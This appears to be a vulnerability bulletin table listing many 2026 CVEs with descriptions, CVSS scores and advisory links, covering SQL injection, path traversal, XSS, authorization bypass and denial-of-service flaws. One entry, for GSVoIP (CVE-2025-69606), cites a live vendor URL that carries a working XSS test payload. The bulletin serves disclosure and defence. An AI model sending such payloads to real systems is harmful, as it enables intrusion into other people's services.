| Dolibarr--ERP CRM | A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. This affects the function _checkValForAPI of the file htdocs/expedition/class/expedition.class.php of the component Shipments API Endpoint. The manipulation of the argument fields leads to sql injection. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 5 | CVE-2026-7688 | VDB-360858 | Dolibarr ERP CRM Shipments API Endpoint expedition.class.php _checkValForAPI sql injection VDB-360858 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #799337 | Dolibarr Dolibarr ERP CRM 23.0.2 and earlier SQL Injection |
| toeverything--AFFiNE | A vulnerability was detected in toeverything AFFiNE up to 0.26.3. This issue affects the function allowDocPreview of the file /workspace/:workspaceId/:docId of the component Public Markdown Preview Endpoint. The manipulation results in authorization bypass. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 5.3 | CVE-2026-7702 | VDB-360871 | toeverything AFFiNE Public Markdown Preview Endpoint :docId allowDocPreview authorization VDB-360871 | CTI Indicators (IOB, IOC, IOA) Submit #804455 | AFFiNE AFFiNE (https://github.com/toeverything/AFFiNE) 0.26.3 Authorization Bypass https://github.com/ngocnn97/security-advisories/blob/main/AFFiNE_BAC_PoC.mp4 |
| VideoFlow Ltd.--VideoFlow Digital Video Protection | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated remote code execution vulnerability that allows authenticated attackers to execute arbitrary system commands by exploiting a cross-site request forgery flaw in the web management interface. Attackers with valid credentials can leverage the CSRF vulnerability to inject and execute system commands through the Tools > System > Shell interface, gaining root-level access to the device. | 2026-04-29 | 4.3 | CVE-2018-25310 | ExploitDB-44387 Vulnerability Advisory VulnCheck Advisory: VideoFlow Digital Video Protection DVP 10 Authenticated Remote Code Execution |
| gnu--wget2 | wget2 accepts a server certificate with incorrect Key Usage (KU) or Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication. | 2026-04-29 | 4.8 | CVE-2026-1858 | https://www.tenable.com/security/research/tra-2026-37 |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 1.0.0 to before version 4.14.4, a heap-based out-of-bounds WRITE occurs in GetAlertData, resulting in writing a NULL byte exactly 1 byte before the start of the buffer allocated by strdup. Due to unsigned integer underflow and pointer arithmetic wrapping, the write lands at offset -1 from the buffer, corrupting heap metadata. A malicious actor can potentially leverage this issue through a compromised agent to cause denial of service or heap corruption by injecting a specially crafted alert into the alerts log file monitored by wazuh-logcollector. This issue has been patched in version 4.14.4. | 2026-04-29 | 4.4 | CVE-2026-26204 | https://github.com/wazuh/wazuh/security/advisories/GHSA-j4c7-hwjw-8857 https://github.com/wazuh/wazuh/releases/tag/v4.14.4 |
| Oracle Corporation--Oracle Linux | An unprivileged attacker can craft a user-space process with a malicious ELF binary containing an out-of-range sh_link field. When root-level dtrace attaches to -- or instruments -- that process (via dtrace -p , pid probes, or USDT), the ELF parser reads heap memory beyond the allocated section cache array without any bounds check. This results in an uninitialized/out-of-bounds heap read that can cause a NULL pointer dereference crash of the dtrace process (DoS), or -- depending on heap layout -- a read-then-use of a garbage pointer controlled by adjacent allocations, providing a foothold toward further exploitation in a privileged context. | 2026-05-01 | 4.4 | CVE-2026-35233 | Oracle Advisory |
| n/a-- V2Board v1.7.4 | SQL Injection via ORDER BY clause in V2Board thru 1.7.4. In app/Http/Controllers/Admin/UserController.php, the sort parameter from user input is passed directly to User::orderBy($sort, $sortType) without validation. An authenticated admin can sort users by any database column including password, remember_token, and other sensitive fields, enabling information disclosure through ordering analysis. | 2026-05-01 | 4.9 | CVE-2026-37505 | https://github.com/v2board/v2board https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9 |
| nextlevelbuilder--ui-ux-pro-max-skill | A vulnerability has been found in nextlevelbuilder ui-ux-pro-max-skill up to 2.5.0. Affected by this issue is the function data.get of the file .claude/skills/design-system/scripts/generate-slide.py of the component Slide Generator. Such manipulation leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-01 | 4.3 | CVE-2026-7596 | VDB-360549 | nextlevelbuilder ui-ux-pro-max-skill Slide Generator generate-slide.py data.get cross site scripting VDB-360549 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805510 | nextlevelbuilder ui-ux-pro-max-skill 2.5.0 Slide Generator Multiple Stored XSS https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/issues/247 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/pull/274 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/ |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.6. Affected is an unknown function of the file src/amf/gmm-handler.c of the component AMF. The manipulation of the argument reg_type leads to denial of service. The attack is possible to be carried out remotely. Upgrading to version 2.7.7 is able to address this issue. The identifier of the patch is ebc66942b6f8f1fab2d640e71cf4e9f1a423b426. It is advisable to upgrade the affected component. | 2026-05-02 | 4.3 | CVE-2026-7601 | VDB-360558 | Open5GS AMF gmm-handler.c denial of service VDB-360558 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805675 | Open5GS v.2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4321 https://github.com/open5gs/open5gs/commit/ebc66942b6f8f1fab2d640e71cf4e9f1a423b426 https://github.com/open5gs/open5gs/releases/tag/v2.7.7 https://github.com/open5gs/open5gs/ |
| itsourcecode--Courier Management System | A vulnerability was determined in itsourcecode Courier Management System 1.0. Affected is an unknown function of the file /edit_user.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-05-02 | 4.7 | CVE-2026-7612 | VDB-360569 | itsourcecode Courier Management System edit_user.php sql injection VDB-360569 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806275 | itsourcecode Courier Management System V1.0 SQL Injection https://github.com/ltranquility/submit/issues/12 https://itsourcecode.com/ |
| ChatGPTNextWeb--NextChat | A flaw has been found in ChatGPTNextWeb NextChat up to 2.16.1. This impacts an unknown function of the file Next.js of the component API Endpoint. Executing a manipulation can lead to permissive cross-domain policy with untrusted domains. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 4.3 | CVE-2026-7643 | VDB-360755 | ChatGPTNextWeb NextChat API Endpoint Next.js cross-domain policy VDB-360755 | CTI Indicators (IOB, IOC, IOA) Submit #806833 | ChatGPTNextWeb NextChat 2.16.1 Permissive CORS Wildcard Policy https://github.com/ChatGPTNextWeb/NextChat/issues/6756 https://github.com/ChatGPTNextWeb/NextChat/ |
| n/a--crmeb_java | A vulnerability was detected in crmeb_java up to 1.3.4. This vulnerability affects unknown code of the file crmeb/crmeb-service/src/main/java/com/zbkj/service/service/impl/UploadServiceImpl.java of the component Admin Upload. Performing a manipulation of the argument model results in unrestricted upload. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.7 | CVE-2026-7673 | VDB-360826 | crmeb_java Admin Upload UploadServiceImpl.java unrestricted upload VDB-360826 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800684 | crmeb crmeb_java 1.3.4 Unrestricted Upload https://fx4tqqfvdw4.feishu.cn/docx/EgMOdHyq6oyxhux5vpJcr5cgnAf?from=from_copylink |
| kerwincui--FastBee | A vulnerability was found in kerwincui FastBee up to 1.2.1. The affected element is the function ToolController.download of the file springboot/fastbee-open-api/src/main/java/com/fastbee/data/controller/ToolController.java of the component Tool Download Endpoint. The manipulation of the argument fileName results in path traversal. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.3 | CVE-2026-7676 | VDB-360829 | kerwincui FastBee Tool Download Endpoint ToolController.java ToolController.download path traversal VDB-360829 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800723 | kerwincui FastBee ≤ 1.2.1 Path Traversal https://fx4tqqfvdw4.feishu.cn/docx/Yv1gdAzFpoHCUUxDdKSculR4nKf?from=from_copylink |
| jsbroks--COCO Annotator | A weakness has been identified in jsbroks COCO Annotator up to 0.11.1. Affected is an unknown function of the file backend/webserver/api/datasets.py of the component Data Endpoint. Executing a manipulation of the argument folder can lead to path traversal. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.3 | CVE-2026-7680 | VDB-360833 | jsbroks COCO Annotator Data Endpoint datasets.py path traversal VDB-360833 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #801150 | jsbroks COCO Annotator 0.11.1 Absolute Path Traversal https://github.com/natanmorette-thoropass/thoropass-vuln-research-program/tree/main/2026/Path%20Traversal%20via%20Dataset%20Folder%20Parameter |
| AMTT--Hotel Broadband Operation System | A vulnerability was determined in AMTT Hotel Broadband Operation System 1.0. Affected is an unknown function of the file /manager/card/cardhand_submit.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.7 | CVE-2026-7697 | VDB-360866 | AMTT Hotel Broadband Operation System cardhand_submit.php sql injection VDB-360866 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803272 | Anmei Century (Beijing) Technology Co., Ltd. Hotel Broadband Operation System v1.0 SQL Injection https://github.com/testnet0/testnet/issues/74 |
| Telegram--Desktop | A security vulnerability has been detected in Telegram Desktop up to 6.7.5. This vulnerability affects the function RequestButton of the file Telegram/SourceFiles/boxes/url_auth_box.cpp of the component Bot API. The manipulation of the argument login_url leads to null pointer dereference. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.3 | CVE-2026-7701 | VDB-360870 | Telegram Desktop Bot API url_auth_box.cpp RequestButton null pointer dereference VDB-360870 | CTI Indicators (IOB, IOC, IOA) Submit #804341 | Telegram Telegram Desktop <= 6.7.5 NULL Pointer Dereference https://www.youtube.com/watch?v=xo9Bplsy1K8 |
| AV Stumpfl--Pixera Two Media Server | A vulnerability has been found in AV Stumpfl Pixera Two Media Server up to 25.1 R2. The affected element is an unknown function of the component Service Port 1338. Such manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 25.2 R3 is sufficient to fix this issue. It is advisable to upgrade the affected component. | 2026-05-03 | 4.3 | CVE-2026-7704 | VDB-360873 | AV Stumpfl Pixera Two Media Server Service Port 1338 path traversal VDB-360873 | CTI Indicators (IOB, IOC, TTP) Submit #805275 | AV Stumpfl Pixera Two Media Server < 25.2 R3 Arbitrary File Read https://gist.github.com/TrebledJ/585a20525e45549f299d282233632608 https://help.pixera.one/changelogs-version-overviews/pixera-252-overview-changelog |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. This issue affects the function gmm_handle_service_request of the file /src/amf/gmm-handler.c of the component AMF. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-03 | 4.3 | CVE-2026-7706 | VDB-360882 | Open5GS AMF gmm-handler.c gmm_handle_service_request denial of service VDB-360882 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805698 | Open5GS AMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4409 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. Impacted is the function udr_nudr_dr_handle_subscription_context of the file /src/udr/nudr-handler.c of the component UDR. The manipulation of the argument pei results in denial of service. The attack can be launched remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-03 | 4.3 | CVE-2026-7707 | VDB-360883 | Open5GS UDR nudr-handler.c udr_nudr_dr_handle_subscription_context denial of service VDB-360883 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805699 | Open5gs UDR v2.7.7 Denial of Service Submit #805700 | Open5gs UDR v2.7.7 Denial of Service (Duplicate) https://github.com/open5gs/open5gs/issues/4410 https://github.com/open5gs/open5gs/issues/4411 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. The affected element is the function ogs_dbi_subscription_data in the library /lib/dbi/subscription.c of the component UDR. This manipulation of the argument supi_id causes denial of service. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-03 | 4.3 | CVE-2026-7708 | VDB-360884 | Open5GS UDR subscription.c ogs_dbi_subscription_data denial of service VDB-360884 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805701 | Open5gs UDR v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4412 https://github.com/open5gs/open5gs/ |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Oracle Corporation--Oracle Linux | An unprivileged attacker can reliably trigger a crash of the dtrace process with a malicious ELF binary due to an integer Divide-by-Zero in Pbuild_file_symtab() | 2026-05-01 | 3.3 | CVE-2026-21996 | Oracle Advisory |
| redhat[.]com--gnutls | A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted Online Certificate Status Protocol (OCSP) response during a TLS handshake. Due to a logic error in how gnutls processes multi-record OCSP responses, a client with OCSP verification enabled may incorrectly accept a revoked server certificate, potentially leading to a compromise of trust. | 2026-04-30 | 3.7 | CVE-2026-3832 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-3832 RHBZ#2445762 https://gitlab.com/gnutls/gnutls/-/issues/1801 |
| TRENDnet--TEW-821DAP | A weakness has been identified in TRENDnet TEW-821DAP 1.12B01. This issue affects the function find_hwid/new_gui_update_firmware of the component Firmware Update Handler. Executing a manipulation of the argument dest can lead to insufficient verification of data authenticity. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 3.7 | CVE-2026-7606 | VDB-360563 | TRENDnet TEW-821DAP Firmware Update new_gui_update_firmware data authenticity VDB-360563 | CTI Indicators (IOB, IOC, IOA) Submit #806213 | Trendnet TEW-821DAP v1.12B01 CWE-287 Improper Authentication https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Auth.md |
| TRENDnet--TEW-821DAP | A vulnerability has been found in TRENDnet TEW-821DAP 1.12B01. This affects an unknown function of the file /www/cgi/ssi of the component Firmware Update. Such manipulation leads to cleartext transmission of sensitive information. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit has been disclosed to the public and may be used. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 3.7 | CVE-2026-7610 | VDB-360567 | TRENDnet TEW-821DAP Firmware Update ssi cleartext transmission VDB-360567 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806217 | Trendnet TEW-821DAP v1.12B01 CWE-319: Cleartext Transmission of Sensitive Information https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Down.md |
| TRENDnet--TEW-821DAP | A vulnerability was found in TRENDnet TEW-821DAP up to 1.12B01. This impacts the function platform_do_upgrade_cameo_dev of the file cameo_dev.sh of the component Firmware Update Handler. Performing a manipulation results in insufficient verification of data authenticity. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 3.7 | CVE-2026-7611 | VDB-360568 | TRENDnet TEW-821DAP Firmware Update cameo_dev.sh platform_do_upgrade_cameo_dev data authenticity VDB-360568 | CTI Indicators (IOB, IOC, IOA) Submit #806218 | Trendnet TEW-821DAP v1.12B01 CWE-327 Use of a Broken or Risky Cryptographic Algorithm https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Inte.md |
| CodeWise--Tornet Scooter Mobile App | A vulnerability has been found in CodeWise Tornet Scooter Mobile App 4.75 on iOS/Android. The impacted element is an unknown function of the file /TwoFactor. Such manipulation leads to improper restriction of excessive authentication attempts. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is regarded as difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 3.7 | CVE-2026-7671 | VDB-360819 | CodeWise Tornet Scooter Mobile App TwoFactor excessive authentication VDB-360819 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #799987 | CodeWise Technologies, Tornet Scooter (Mobile APP) 4.75 Improper Restriction of Excessive Authentication Attempts (CWE-3 https://drive.proton.me/urls/M0WFM4137W#MY0jA6pjHYPO |
| kerwincui--FastBee | A vulnerability was determined in kerwincui FastBee up to 1.2.1. The impacted element is the function Add of the file springboot/fastbee-admin/src/main/java/com/fastbee/web/controller/system/SysNoticeController.java of the component System Notice Handler. This manipulation of the argument noticeContent causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 3.5 | CVE-2026-7677 | VDB-360830 | kerwincui FastBee System Notice SysNoticeController.java add cross site scripting VDB-360830 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800724 | kerwincui FastBee ≤ 1.2.1 Improper Neutralization of Alternate XSS Syntax https://fx4tqqfvdw4.feishu.cn/docx/Iu5Dd558UoS4uIxhH9YcgNsWnjc?from=from_copylink |
| Dolibarr--ERP CRM | A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of cryptographic signature. The attack may be performed from remote. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 3.7 | CVE-2026-7689 | VDB-360859 | Dolibarr ERP CRM Online Signature security.lib.php dol_verifyHash signature verification VDB-360859 | CTI Indicators (IOB, IOC, IOA) Submit #801794 | Dolibarr Dolibarr ERP/CRM 23.0.2 Authentication Bypass Issues https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| n/a--Sourcecodester Online Job Portal phppdo 1.0 | SQL Injection vulnerability exists in Sourcecodester Online Job Portal phppdo 1.0 ivia the category parameter in /jobportal/index.php. | 2026-04-27 | not yet calculated | CVE-2021-36438 | https://www.linkedin.com/in/mohamed-elobeid-oscp-ewptxv2-crtp-cissp-mba-537ba485/ https://thecyberpost.com/tools/exploits-cve/online-job-portal-in-php-pdo-1-0-sql-injection/ |
| Lobster GmbH--Lobster_pro | Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services. | 2026-04-30 | not yet calculated | CVE-2024-13971 | https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/ |
| 4D--4D Server | Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services. | 2026-04-30 | not yet calculated | CVE-2024-39847 | https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/ https://4d.com |
| n/a--NASA EOSDIS MODAPS | NASA Earth Observing System Data and Information System (EOSDIS) MODAPS v8.1 was discovered to contain a SQL injection vulnerability in the category parameter | 2026-04-27 | not yet calculated | CVE-2024-46636 | https://www.linkedin.com/in/abdulrahman-aldossary-842b6b26b/ https://bugcrowd.com/Xnu11 https://github.com/NU1L0/CVE-2024-46636-SQLi-MODAPS |
| Hanwha Vision--QND-8080R | Penetration Testing engineers at Amazon have discovered a flaw where the camera system fails to properly handle data supplied in certain requests, causing a service disruption. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2026-04-28 | not yet calculated | CVE-2024-54011 | https://www.hanwhavision.com/wp-content/uploads/2026/04/Camera-Vulnerability-ReportCVE-2024-5401154013.pdf |
| Hanwha Vision--QND-8080R | Penetration Testing engineers at Amazon discovered a vulnerability where the camera system failed to properly validate input, allowing specially crafted requests containing malicious commands to be executed on the device. The manufacturer has released patch firmware for the flaw; please refer to the manufacturer's report for details and workarounds. | 2026-04-28 | not yet calculated | CVE-2024-54012 | https://www.hanwhavision.com/wp-content/uploads/2026/04/Camera-Vulnerability-ReportCVE-2024-5401154013.pdf |
| Hanwha Vision--QND-8080R | Penetration Testing engineers at Amazon have identified a security flaw related to request handling in the web server component that could, under certain conditions, lead to unintended access to protected functions. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds | 2026-04-28 | not yet calculated | CVE-2024-54013 | https://www.hanwhavision.com/wp-content/uploads/2026/04/Camera-Vulnerability-ReportCVE-2024-5401154013.pdf |
| DeskTime--DeskTime Time Tracking App | Due to improper TLS certificate validation in the DeskTime Time Tracking App before version 1.3.674, attackers who can position themselves in the network path between the client and the DeskTime update servers can return a malicious executable in response to an update request. This allows the attacker to achieve user-level remote code execution on the affected client. | 2026-04-28 | not yet calculated | CVE-2025-10539 | https://r.sec-consult.com/desktime https://desktime.com/download |
| RTI--Connext Professional | Improper Restriction of XML External Entity Reference vulnerability in Connext Professional (Core Libraries) allows Serialized Data External Linking.This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.1.1, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*, from 4.3x before 5.2.*. | 2026-04-30 | not yet calculated | CVE-2025-14543 | https://www.rti.com/vulnerabilities/#cve-2025-14543 |
| The Qt Company--Qt | Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access. | 2026-04-30 | not yet calculated | CVE-2025-14576 | Qt Code Review - Fix for QTBUG-142556 |
| Ribblr--Crotchet and Knitting | Authenticated user can bypass authorization in Ribblr - Crochet & Knitting iOS application | 2026-04-27 | not yet calculated | CVE-2025-15626 | https://ribblr.com/ |
| Apache Software Foundation--Apache Thrift | Mismatched Memory Management Routines vulnerability in Apache Thrift c_glib language bindings. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. Description: Specially crafted requests can crash an c_glib-based Thrift server with a clean but fatal "free(): invalid pointer" error message. | 2026-04-28 | not yet calculated | CVE-2025-48431 | https://lists.apache.org/thread/lb4j0zyd5f3g36cos0wql925przpnwql |
| n/a--B1 Free Archiver v1.5.86 | A vulnerability in B1 Free Archiver v1.5.86 allows files extracted from downloaded archives to bypass Windows Mark of the Web (MotW) protections. When an archive is downloaded from the internet and extracted using B1 Free Archiver, the software fails to propagate the 'Zone.Identifier' alternate data stream to the extracted files. As a result, these files can be executed without triggering Windows Defender SmartScreen warnings or security prompts, enabling untrusted code execution without standard security restrictions. | 2026-04-29 | not yet calculated | CVE-2025-50328 | https://b1.org/ https://github.com/math69b/B1FREE/blob/main/B1%20Free%20Archiver%20version |
| passmark[.]com-- BurnInTest v11.0 | An issue in the component DirectIo64.sys of PassMark BurnInTest v11.0 Build 1011, OSForensics v11.1 Build 1007, and PerformanceTest v11.1 Build 1004 allows attackers to access kernel memory and escalate privileges via a crafted IOCTL 0x8011E044 call. | 2026-05-01 | not yet calculated | CVE-2025-52347 | https://www.passmark.com/products/performancetest/history.php https://www.osforensics.com/whats-new.html https://www.passmark.com/products/burnintest/history.php https://github.com/netero1010/Vulnerability-Disclosure/tree/main/CVE-2025-52347 |
| n/a--Eprosima Micro-XREC-DDS Agent v.3.0.1 | An issue in Eprosima Micro-XREC-DDS Agent v.3.0.1 allows a remote attacker to cause a denial of service via a crafted packet to the MTU length field | 2026-05-01 | not yet calculated | CVE-2025-63547 | https://github.com/eProsima/Micro-XRCE-DDS-Agent/issues/390 https://github.com/j4kb4dw0lf/CVEs/blob/main/README.md |
| n/a--Eprosima Micro-XREC-DDS Agent v.3.0.1 | An issue in Eprosima Micro-XREC-DDS Agent v.3.0.1 allows a remote attacker to cause a denial of service via a packet specially crafted to bear a non-valid value in any Boolean field. | 2026-05-01 | not yet calculated | CVE-2025-63548 | https://github.com/eProsima/Micro-XRCE-DDS-Agent/issues/389 https://github.com/j4kb4dw0lf/CVEs/blob/main/README.md |
| n/a--Pro-Bit | An issue in Pro-Bit before v1.77.4 allows unauthenticated attackers to directly access sensitive directory and its subdirectories. | 2026-04-27 | not yet calculated | CVE-2025-69428 | https://github.com/jasetpen/CVE-2025-69428 |
| n/a--GSVoIP web panel v2.0.90 | Cross-Site Scripting (XSS) vulnerability was discovered in the GSVoIP web panel version 2.0.90. The `msg` parameter in the `/painel/gateways.php/error` endpoint does not properly sanitize user-supplied input, allowing attackers to inject arbitrary JavaScript into the HTML response. A remote attacker can exploit this vulnerability by sending a crafted URL to a victim, leading to unauthorized script execution, session hijacking, phishing, or other client-side attacks. | 2026-05-01 | not yet calculated | CVE-2025-69606 | https://sip2.solutionsvoip.com.br/painel/gateways.php/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E https://www.solutionsvoip.com.br/ https://github.com/Razielx64/CVE-2025-69606-GSVoIP-XSS |
| getfancontrol[.]com--Fan Control App v251 | The Fan Control application V251 contains an improper privilege handling vulnerability in its Open File Dialog. The dialog processes user-supplied paths with elevated permissions, which can be exploited by a local attacker to perform actions with administrator-level privileges. | 2026-04-27 | not yet calculated | CVE-2025-69689 | https://getfancontrol.com https://github.com/Rem0o/FanControl.Releases https://github.com/Rem0o/FanControl.Releases/releases/tag/V251 https://gist.github.com/ahrixia/7c89bb3f1af6e85aeedde5ddb557a529 |
| SonicWall--SonicOS | A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions. | 2026-04-29 | not yet calculated | CVE-2026-0204 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0004 |
| SonicWall--SonicOS | A post-authentication Path Traversal vulnerability in SonicOS allows an attacker to interact with usually restricted services. | 2026-04-29 | not yet calculated | CVE-2026-0205 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0004 |
| SonicWall--SonicOS | A post-authentication Stack-based Buffer Overflow vulnerabilities in SonicOS allows a remote attacker to crash a firewall. | 2026-04-29 | not yet calculated | CVE-2026-0206 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0004 |
| Wolters Kluwer Polska--LEX Baza Dokumentw | LEX Baza Dokumentów is vulnerable to DOM-based XSS in "em" cookie parameter. The application unsafely processes the parameter on the client side, allowing an attacker to execute arbitrary JavaScript in the context of the victim's browser. An attacker with ability to set a cookie can perform a more severe attack, so we evaluate the impact and risk of exploitation as minimal. However, the vendor considered this a vulnerability and released a security patch. This issue was fixed in version 1.3.4. | 2026-04-30 | not yet calculated | CVE-2026-1493 | https://www.wolterskluwer.com/pl-pl/solutions/lex-baza-dokumentow https://cert.pl/posts/2026/04/CVE-2025-1493 |
| Samsung Mobile--Samsung Mobile Devices | Insufficient verification of data authenticity in PackageManagerService prior to SMR Mar-2026 Release 1 allows local attackers to modify the installation restriction of specific application. | 2026-04-29 | not yet calculated | CVE-2026-21023 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=03 |
| OPPO--OPPO Wallet APP | OPPO Wallet APP contains a trusted domain validation flaw that allows attackers to bypass protected interface access restrictions, which may lead to account token hijacking and sensitive information disclosure. | 2026-04-27 | not yet calculated | CVE-2026-22077 | https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-2048652556296790016 |
| Imagination Technologies--Graphics DDK | A web page that contains unusual WebGPU content loaded into the GPU GLES render process and can trigger a write UAF crash in the GPU GLES user-space shared library. On certain platforms, when the process executing graphics workload has system privileges this could enable further exploits on the device. | 2026-05-01 | not yet calculated | CVE-2026-22165 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | A web page that contains unusual WebGPU content loaded into the GPU GLES render process and can trigger write UAF crash in the GPU GLES user-space shared library. On certain platforms, when the process executing graphics workload has system privileges this could enable subsequent exploit on the system. | 2026-05-01 | not yet calculated | CVE-2026-22166 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to force GPU to write to arbitrary physical memory pages. Under certain circumstances this exploit could be used to corrupt data pages not allocated by the GPU driver but memory pages in use by the kernel and drivers running on the platform altering their behaviour. This attack can lead the GPU to perform write operations on restricted internal GPU buffers that can lead to a second order affect of corrupted arbitrary physical memory. | 2026-05-01 | not yet calculated | CVE-2026-22167 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
